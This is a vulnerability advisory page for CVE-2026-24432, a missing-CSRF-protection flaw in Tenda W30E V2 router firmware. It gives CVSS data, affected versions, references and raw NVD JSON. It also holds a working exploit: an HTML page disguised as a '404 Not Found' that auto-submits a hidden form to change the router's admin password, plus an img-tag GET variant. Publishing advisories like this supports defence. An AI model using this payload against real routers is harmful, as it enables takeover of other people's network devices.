CVE-2026-24432

Description

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) lack cross-site request forgery (CSRF) protections on administrative endpoints, including those used to change administrator account credentials. As a result, an attacker can craft malicious requests that, when triggered by an authenticated user’s browser, modify administrative passwords and other configuration settings.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tenda:w30e:-:*:*:*:*:*:*:* - NOT VULNERABLE

Tenda W30E V2 V16.01.0.19(5037) 及之前所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CSRF PoC for Tenda W30E V2 - Change Admin Password -->
<!DOCTYPE html>
<html>
<head>
    <title>404 Not Found</title>
</head>
<body>
    <h1>Page Not Found</h1>
    <p>If you are not redirected in 3 seconds, <a href="http://192.168.0.1">click here</a>.</p>
    
    <form name="csrf" action="http://192.168.0.1/cgi-bin/cstecgi.cgi" method="POST" id="exploit">
        <input type="hidden" name="topicurl" value="/admin/set_account">
        <input type="hidden" name="username" value="admin">
        <input type="hidden" name="password" value="Attacker123!@#">
        <input type="hidden" name="passwordMask" value="Attacker123!@#">
    </form>
    
    <script>
        // Auto-submit form when page loads
        document.getElementById('exploit').submit();
    </script>
</body>
</html>

<!-- Alternative PoC using img tag for GET-based attacks -->
<!--
<img src="http://192.168.0.1/cgi-bin/cstecgi.cgi?topicurl=/admin/set_account&username=admin&password=AttackerPwd" style="display:none">
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-24432
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-24432
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-24432/
[4] VulDB https://vuldb.com/cve/CVE-2026-24432
[5] https://www.tendacn.com/product/W30E
[6] https://www.vulncheck.com/advisories/tenda-w30e-v2-missing-csrf-protections-for-administrative-actions

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-24432", "sourceIdentifier": "[email protected]", "published": "2026-01-26T18:16:40.713", "lastModified": "2026-01-28T20:11:24.923", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) lack cross-site request forgery (CSRF) protections on administrative endpoints, including those used to change administrator account credentials. As a result, an attacker can craft malicious requests that, when triggered by an authenticated user’s browser, modify administrative passwords and other configuration settings."}, {"lang": "es", "value": "Las versiones de firmware de Shenzhen Tenda W30E V2 hasta la V16.01.0.19(5037) inclusive carecen de protecciones contra falsificación de petición en sitios cruzados (CSRF) en los puntos finales administrativos, incluyendo aquellos utilizados para cambiar las credenciales de la cuenta de administrador. Como resultado, un atacante puede elaborar peticiones maliciosas que, cuando son activadas por el navegador de un usuario autenticado, modifican las contraseñas administrativas y otras configuraciones."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "16.01.0.19\\(5037\\)", "matchCriteriaId": "4DB07B19-71FC-4936-98BD-36A8B3B7CBF0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:w30e:-:*:*:*:*:*:*:*", "matchCriteriaId": "02FBE634-0D3F-4439-B4A6-F427C82967C7"}]}]}], "references": [{"url": "https://www.tendacn.com/product/W30E", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/tenda-w30e-v2-missing-csrf-protections-for-administrative-actions", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}